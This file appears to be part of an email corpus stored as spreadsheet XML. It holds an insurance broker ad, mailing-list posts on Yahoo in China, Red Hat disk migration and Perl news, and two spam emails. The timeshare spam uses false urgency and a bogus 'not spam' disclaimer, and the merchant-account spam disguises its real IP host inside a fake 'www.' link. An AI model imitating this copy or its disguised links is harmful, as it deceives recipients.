 &lt;title&gt;Pru Life's UL Portfolio Rocks&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
 			&lt;img src=3D"http://iiq.us/images/nbc/20020701-101.gif" width=3D"550" =
 height=3D"50" alt=3D"PruLife Universal Protector"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/nbc/20020701-102.gif" =
 width=3D"550" height=3D"22" alt=3D"- and -"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/nbc/20020701-103.gif" =
 width=3D"550" height=3D"46" alt=3D"Prulife Universal Plus"&gt;&lt;br&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/nbc/20020701-104a.gif" =
 width=3D"93" height=3D"74"&gt;&lt;img =
 src=3D"http://iiq.us/images/nbc/20020701-105.jpg" width=3D"409" =
 height=3D"74" alt=3D"ROCK!"&gt;&lt;br&gt;
       &amp;nbsp; &lt;br&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;p align=3D"center"&gt;
               &lt;b&gt;&lt;font size=3D"3"&gt;&lt;font color=3D"#FF0000"&gt;Case =
 Closed!&lt;/font&gt;
               Permanent Life Insurance at Affordable =
 Rates&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;font size=3D"2"&gt;
             &lt;p&gt;Whether your clients are looking to pay the Minimum=20
               Premiums needed to Endow* a policy at a specific age or =
 pay sufficient=20
               premiums needed to guarantee** a death benefit for&lt;br&gt;
               life, Prudential has the answer.&lt;/p&gt;
             &lt;p&gt;PruLife Universal Protector&lt;sup&gt;SM&lt;/sup&gt; offers=20
               competitive lifetime death benefit guarantee premiums. =
 PruLife Universal=20
               Plus&lt;sup&gt;SM&lt;/sup&gt; offers competitive minimum premiums to =
 endow and=20
               competitive long term cash value accumulation.&lt;/p&gt;
             &lt;/font&gt;
             &lt;p align=3D"center"&gt;&lt;font size=3D"3"&gt;&lt;i&gt;And that's not all. =
 Look what=20
               else Prudential+ has to offer...&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000066"&gt;COMPETITIVE COMPENSATION&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt;&lt;b&gt;Rolling Commissionable Target =
 Premiums (R-CTP)++.&lt;/b&gt;&lt;br&gt;
                   First year compensation will be paid until the R-CTP =
 is reached=20
                   during the first 24 policy months.&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt; &lt;b&gt;First year commissions&lt;/b&gt;=20
                   that do not reduce at any issue age.&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font =
 color=3D"#000066"&gt;&amp;nbsp;COMPETITIVE UNDERWRITING&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Issue ages&lt;/b&gt; =
 0-90&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Continuation of =
 coverage&lt;/b&gt;=20
                   beyond age 100 (policy has no maturity =
 age).&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt;&lt;b&gt;Preferred Non-Smoker category&lt;/b&gt;
                   for cigar smokers, pipe smokers and smokeless tobacco =
 users=20
                   (nicotine patch and gum users also may be eligible if =
 they have=20
                   not smoked cigarettes in the last 12 months) &lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Preferred Plus =
 Smoker&lt;/b&gt; category=20
                   for healthy Cigarette Smokers.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt;&lt;b&gt;Aviation:&lt;/b&gt; Preferred rates=20
                   may be offered to commercial pilots and most student =
 and private=20
                   pilots who fly up to 200 hours per year, regardless of =
 whether=20
                   helicopters or fixed wing aircraft are flown.&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Treadmills not =
 required&lt;/b&gt;=20
                   for preferred rates for face amounts within our =
 capacity limits&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Improved =
 Ratings&lt;/b&gt; for Prostate=20
                   Cancer, Hepatitis B &amp;amp; C&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt; &lt;b&gt;Heart attack?&lt;/b&gt; =
 Consider=20
                   Prudential as soon as the prospect returns to normal =
 activities&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Liberal Build =
 Tables&lt;/b&gt; to=20
                   qualify for Preferred rates&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font color=3D"#000066"&gt;INCREASED =
 CAPACITY&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;$70 million =
 capacity&lt;/b&gt; without=20
                   the need to discuss a risk with =
 reinsurers.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Facultative =
 reinsurance&lt;/b&gt;=20
                   may be available for cases in excess of $70 =
 million.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;Click our logo for the BGA nearest =
 you!&lt;br&gt;
             &lt;a href=3D"http://www.insiq.com/resdir/special/nbc/"&gt;&lt;img =
 src=3D"http://iiq.us/images/nbc/20020701-4.jpg" width=3D"528" =
 height=3D"86" alt=3D"Click here for the NBC BGA Locator!" =
 border=3D"0"&gt;&lt;/a&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;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colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"jdarnell@sourcebrok.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"NBC Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/nbc/20020701-3.gif" =
 width=3D"241" height=3D"149" alt=3D"National Brokerage Consortium"&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font size=3D"1"&gt;* Minimum Premium to Endow is a =
 hypothetical, non-guaranteed=20
             premium that, based on current charges and the current =
 interest rate,=20
             would keep the policy in force to age 100. Interest rates =
 and charges=20
             will change over time, as will the Minimum Premium to Endow. =
 These=20
             premiums are shown as hypothetical figures based on the =
 stated assumptions=20
             and are shown for comparative purposes only. The actual =
 premium needed=20
             to keep the policy in force is based on actual results and =
 may be=20
             higher or lower. ** All guarantees are based on the =
 claims-paying=20
             ability of the issuer. &lt;br&gt;
             + PruLife Universal Protector is issued by Pruco Life =
 Insurance Company.=20
             PruLife Universal Plus also is issued by Pruco Life =
 Insurance Company=20
             in all states except New Jersey and New York, where it is =
 issued by=20
             Pruco Life Insurance Company of New Jersey, both Prudential =
 Financial,=20
             Inc. companies located at 213 Washington Street, Newark, NJ =
 07102-2992.=20
             Each is solely responsible for its own financial condition =
 and contractual=20
             obligations. &lt;br&gt;
             ++ Available on contracts dated Jan. 1, 2002 &amp;amp; later. =
 Not available=20
             in New York &amp;amp; New Jersey.&lt;br&gt;
             Prudential Financial is a service mark of The Prudential =
 Insurance=20
             Company of America, Newark, NJ and its affiliates. For =
 financial professional=20
             use only. Not for use with the public. &lt;br&gt;
             IFS-A072238 Ed. 7/2002 Exp. 12/2003&lt;/font&gt;&lt;/td&gt;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size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_266701_01C22CE6.6C78C6F0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Down the Yahoo river
</t>
  </si>
  <si>
    <t xml:space="preserve">
 fwd-----
 It would appear that Yahoo! has joined the ranks of western companies
 dedicated to helping restrict the freedoms of people in other countries
 for the sake of improving their profit margins. Yahoo! has signed the
 "Public Pledge on Self-discipline for China Internet Industry" (more
 here http://www.dfn.org/voices/china/selfdiscipline.htm ), essentially a
 promise to help police Chinese internet users for the
 State:
 &gt;&gt;&gt;From this article in The Nando Times:
 http://www.nandotimes.com/technology/story/494845p-3946998c.html
 The Chinese version of the popular Yahoo! Internet portal risks becoming
 an online policeman for China's communist government if it keeps a promise
 to voluntarily investigate potentially subversive content, a human rights
 group has warned.
 "If it implements the pledge, Yahoo! will become an agent of Chinese law
 enforcement," Kenneth Roth, Human Rights Watch's executive director, said
 Friday. "It will switch from being an information gateway to an
 information gatekeeper."
 More from Human Rights Watch.
 http://hrw.org/press/2002/08/yahoo080902.htm
 ----------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Luis Villa wrote:
  &gt; So you /are/ beberg posting under another name.
  &gt; Finally proof of what we've known all along. ;)
 That'll come to a shock to Geege, I'm sure...
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 3 Locations Free:Orlando,Las Vegas,Ft Laud.
</t>
  </si>
  <si>
    <t xml:space="preserve">This is an HTML email message.  If you see this, your mail client does not support HTML messages.
 ------=_NextPart_CMIDKJHJKO
 Content-Type: text/html;charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;html&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img src="http://www.famtriptravel.com/images/80_famlogo0.gif" width="737" height="119"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
   &lt;tr&gt;
     &lt;td width="92%" valign="top"&gt;CONGRATULATIONS ON
       RECEIVING THIS SPECIAL E-MAIL INVITATION!!!&amp;nbsp;&lt;br&gt;
 &lt;br&gt;
       THESE INVITATIONS WERE ONLY BEING SENT OUT... TO A VERY SELECT GROUP OF
       INDIVIDUALS LIKE YOURSELF... WHO WERE CONFIRMED AND QUALIFIED TO RECEIVE THIS SPECTACULAR
       OFFER!!!&lt;br&gt;
 &lt;br&gt;
       PLEASE CLICK ON THE LINK BELOW TO REGISTER AND RECEIVE YOUR COMPLIMENTARY
       THREE NIGHT STAY IN YOUR CHOICE OF THREE (3) OF THESE NINE (9) FUN FILLED LOCATIONS!!!&lt;br&gt;
 &lt;br&gt;
       - MAGICAL ORLANDO&lt;br&gt;
       - LAS VEGAS... CITY OF LIGHTS&lt;br&gt;
       - PALM BEACH, FL.... FLORIDA'S BEST KEPT SECRET&lt;br&gt;
       - FABULOUS FT, LAUDERDALE&lt;br&gt;
       - ATLANTIC CITY... CITY OF EXCITEMENT&lt;br&gt;
       - NEW SMYRNA BEACH , FL.... SECLUDED FROM IT ALL&lt;br&gt;
       - DAYTONA BEACH , FL... THE WORLDS MOST FAMOUS BEACH&lt;br&gt;
       - KEY WEST, FL... THE SOUTHERN MOST POINT IN THE U.S.&lt;br&gt;
       - MIAMI &amp;quot; SOUTH BEACH&amp;quot;. THE CITY THAT NEVER SLEEPS&lt;br&gt;
 &lt;br&gt;
       SO LOG ONTO: &lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;http://www.famtriptravel.com/3mv_cntr.html&lt;/a&gt;  
       ... For your Complimentary Vacations for two!!!&lt;br&gt;
 &lt;br&gt;
       KEEP IN MIND... OUR OBLIGATION TO HOLD YOUR VACATIONS WILL EXPIRE 72 HOURS
       FROM THE DATE OF DELIVERY OF THIS SPECIAL INVITATION&lt;br&gt;
 &lt;br&gt;&lt;/td&gt;
     &lt;td width="28%"&gt;&lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/fmarriot_logo.jpg" width="94" height="60"&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&amp;nbsp;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/sheraton-hr.jpg" width="99" height="70"&gt;&lt;/a&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/diplomat_logo.jpg" width="106" height="58"&gt;&lt;/a&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/radisson.jpg" width="105" height="38"&gt;&lt;/a&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/ramada.jpg" width="117" height="42"&gt;&lt;/a&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/hamptoninn.jpg" width="108" height="60"&gt;&lt;/a&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/holidayinn_logo.gif" width="89" height="48"&gt;&lt;/a&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/hojo_logo.gif" width="73" height="41"&gt;&lt;/a&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;u1:p&gt;&lt;/u1:p&gt;&lt;span style='color:black'&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
   &lt;p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto' align="center"&gt;&lt;a href="http://www.famtriptravel.com/3mv_cntr.html"&gt;&lt;img border="0" src="http://www.famtriptravel.com/images/comfyinn_logo.jpg" width="49" height="50"&gt;&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;p&gt;
 SPECIAL DISCLAIMER: This message is sent in compliance of the proposed BILL
 Section 301,&lt;br&gt;
 Paragraph (a)(2)(c) of S. 1618. By providing a valid &amp;quot;remove me&amp;quot;
 feature it can not be&lt;br&gt;
 considered SPAM. Furthermore, we make every effort to insure that the recipients
 of our&lt;br&gt;
 direct marketing are those individuals who have asked to receive additional
 informaion on&lt;br&gt;
 promotional offers from companies who offer Internet Marketing Products. Again
 we&lt;br&gt;
 apologize if this message has reached you in error. Screening of addresses has
 been done&lt;br&gt;
 to the best of our technical ability. We honor all removal requests. If you
 would like,&lt;br&gt;
 you can be removed from any future mailings by the sponsor listed above by
 e-mailing&lt;br&gt;
 &lt;a href="mailto:removeme@famtriptravel.com"&gt;mailto:removeme@famtriptravel.com&lt;/a&gt; 
 with the subject &amp;quot;remove me&amp;quot; in the subject line.&lt;br&gt;
 &lt;br&gt;
 This advertising material is being used for the purpose of soliciting sales of a
 vacation&lt;br&gt;
 interval ownership plan.&lt;br&gt;
 &lt;/p&gt;
 &lt;/html&gt;
 ------=_NextPart_CMIDKJHJKO--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Architecture crossover trouble w RH7.2 (solved)
</t>
  </si>
  <si>
    <t xml:space="preserve">Surely it would be faster to save you conf files, install it on the box
 again, copy back you confs and voila.
 All you car about are the confs as the boite has no DATA right?
 Thats what I would do, but you sysadmins have to make life as difficult &amp;
 complicated as possible ;--)
 Have you thought about mirroring the system drives? Might save you serious
 hassle down the line. 
 Only kidding but thats what I would do.
 CW
 ----------------
 OK, Here's how to do it [1] ...
 While the disk is still installed in the i686 machine (if that's broken,
 beg, borrow or steal...), remove the i686 versions of glibc and kernel and
 install the i386 versions.  This will break one or two other packages since
 they have entries in /etc/ld.so.conf which belongs to glibc.  these packages
 will need to be reinstalled.  So:
 1. rpm -e --nodeps glibc
 	Your /etc/ld.so.conf has been saved as /etc/ld.so.conf.rpmsave
 2. rpm -ivh glibc-&lt;v.e.r-no&gt;-i386.rpm
 3. rpm -e --nodeps kernel
 4. rpm -ivh kernel-&lt;v.e.r-no&gt;-i386.rpm
 This installs the i386 versions of kernel and glibc.  You'll be able to boot
 in a non 686 machine now.  However, X is now broken as is kerberos.  At
 least those are the two I noticed.  Your /etc/ld.so.conf.rpmsave will
 contain clues as to what else might be broken.  To fix X and kerberos you
 need to reinstall their libs (copying /etc/ld.so.conf.rpmsave back to
 /etc/ld.so.conf doesn't seem to work):
 1. rpm -ivh --replacepkgs XFree86-libs-&lt;v.e.r-no&gt;-i386.rpm
 2. rpm -ivh --replacepkgs krb5-libs-&lt;v.e.r-no&gt;-i386.rpm
 fixes them.  Other libs listed in _my_ /etc/ld.so.conf are qt, mysql and
 sane.  If they start behaving in odd fashions, it may be related.
 Reinstalling the libs for these packages may fix that.
 Thanks guys...
 &gt; [snip]
 &gt; 
 &gt; &gt; &gt; [I] wouldn't bog it down with X either.
 &gt; &gt;
 &gt; &gt; That's a thought but it may be useful for the server to be available as
 a
 &gt; &gt; user machine also (maybe staff only, maybew admin only).  In any
 &gt; &gt; case, the
 &gt; &gt; local admin (who doesn't exist as yet) will probably be using GUI
 &gt; &gt; tools rather
 &gt; &gt; than cli ones...
 &gt; 
 &gt; Well, yes, it could be running lovely GUI tools as well. Though, are you
 &gt; sure you want to have them available? Most of the ones I've seen are
 better
 &gt; of to be put down. I'd rather then be using Webmin for day to day
 &gt; maintenance, and give the local admins just a restricted set of things
 they
 &gt; can do with it. Like adding and removing users and the likes. Then the
 &gt; "dangerous" parts of the admining side can be "hidden" away from their
 &gt; prying hands. True, they can always break into it, since they have
 physical
 &gt; access to it as well. On the other hand it would be better if they
 contacted
 &gt; yourself for the remaining admin tasks, since I believe this was supposed
 to
 &gt; be remotely administered by yourself, IIRC??
 Since this thing will be on a sub 56k dialup, any remote admin will be
 strictly of the emergency variety.  I plan to have the server mail me its
 logs and stuff regurlarly so I can keep an eye on it but most/all of the
 admin will be done locally.
 Conor
 [1] "it" being migrate a Hard Disk from an Intel P3/4/celeron box to an AMD
 K6-x box.  Essentially, the P3/4/celeron processor is an i686 class while
 the AMD K6 processor is an i586 class (not sure about the AMD athlon or
 duron chips).  A RHL installed on the i686 class machine will not boot on an
 i586 calss box since both kernel and glibc are optimised for i686.  The
 solution is to replace the i686 kernel and glibc with i386 versions.
 -- 
 Conor Daly 
 Met Eireann, Glasnevin Hill, Dublin 9, Ireland
 Ph +353 1 8064276 Fax +353 1 8064247
 ------------------------------------
 bofh.irmet.ie running RedHat Linux 10:27am  up 8 days, 23:57,  5 users,
 load average: 0.19, 0.30, 0.49
 **********************************************************************
 This email and any files transmitted with it are confidential and
 intended solely for the use of the individual or entity to whom they
 are addressed. If you have received this email in error please notify
 the system manager.
 This footnote also confirms that this email message has been swept 
 for the presence of computer viruses.
 **********************************************************************
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] [OT]:Bill Gates in Peru
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi guys,
    slightly OT. This comes from The Register from last
 month, but I only came across it;
 http://www.theregister.co.uk/content/4/26207.html
    Some/all of you may know that the government in
 Peru were going to instruct state bodies to look at
 using open source software in an attempt to save money
 over M$ licences. Well, read the above article.
    Eamonn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</si>
  <si>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Subject: [use Perl] Stories for 2002-08-18
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * TPJ Ceases Publication
 +--------------------------------------------------------------------+
 | TPJ Ceases Publication                                             |
 |   posted by hfb on Friday August 16, @21:17 (news)                 |
 |   http://use.perl.org/article.pl?sid=02/08/17/0118230              |
 +--------------------------------------------------------------------+
 [0]TorgoX writes "Bad news, folks: [1]SysAdmin is stopping publishing The
 Perl Journal. I just heard from the SysAdmin editors. Ad revenues are
 down so much that all tech mags are apparently in dire straits, and
 SysAdmin has basically been taking a big loss on TPJ for a while now; and
 the money people say that it just can't keep doing that. So the issue
 that's in the mail now is apparently [2]the last."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/17/0118230
 Links:
     0. http://%7Bsburke%7D%20%7Bat%7D%20%7Bcpan.org%7D
     1. http://www.sysadminmag.com/
     2. http://www.sysadminmag.com/tpj/images/covers/issue25.jpg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</si>
  <si>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SALES DOWN? ACCEPT CREDIT CARDS &amp; TRIPLE THEM!              32604
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;NO MONEY Down Merchant Accounts!&lt;/title&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;.main {  font-family: Verdana, Arial, Helvetica, =
 sans-serif; font-size: 12px; color: #000080}
 .footer {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: =
 10px; color: #000000}
 A:link {text-decoration: none; color: #0808F1}
 A:visited {text-decoration: none; color: #0808F1}
 A:active {text-decoration: none; color: #FF0000}
 A:hover {text-decoration: none; color: #1B3351}&lt;/style&gt;
 &lt;body topmargin=3D"4" leftmargin=3D"4"&gt;&lt;table width=3D"500" align=3D"cente=
 r" cellspacing=3D"0" cellpadding=3D"2"  border=3D"1" bordercolor=3D"#1A192=
 9"&gt;
 &lt;tr&gt;
 	&lt;td&gt;&lt;table width=3D"496" bgcolor=3D"#E0E9F1" border=3D"0"&gt;
 &lt;tr&gt;
 	&lt;td&gt;&lt;table&gt;
 &lt;tr&gt;
 	&lt;td&gt;&lt;img src=3D"http://61.129.81.74/images/add1.1.gif" alt=3D"" width=3D"=
 101" height=3D"140" border=3D"0"&gt;&lt;/td&gt;
     &lt;td align=3D"justify" valign=3D"top" class=3D"main"&gt;&lt;strong&gt;&lt;font size=
 =3D"4" face=3D"verdana" color=3D"#142A48"&gt;&lt;center&gt;NO MONEY Down Merchant A=
 ccounts!&lt;/center&gt;&lt;/font&gt;&lt;/strong&gt;&lt;p&gt;
 If you own your own business, you're starting a new business or know someo=
 ne who is... Being able to accept Major Credit Cards can make all the diff=
 erence in the world!&lt;P&gt;
 &lt;center&gt;&lt;strong&gt;&lt;font size=3D"3" color=3D"ED1C24"&gt;&lt;a href=3D"http://www.91=
 0736149710429186250134857@61.129.81.74/bp/mer1/index.html"&gt;CLICK HERE&lt;/a&gt;&lt;=
 /font&gt;&lt;/strong&gt;&lt;/center&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;table&gt;
 &lt;tr&gt;
 	&lt;td align=3D"justify" valign=3D"top" class=3D"main" background=3D"http://=
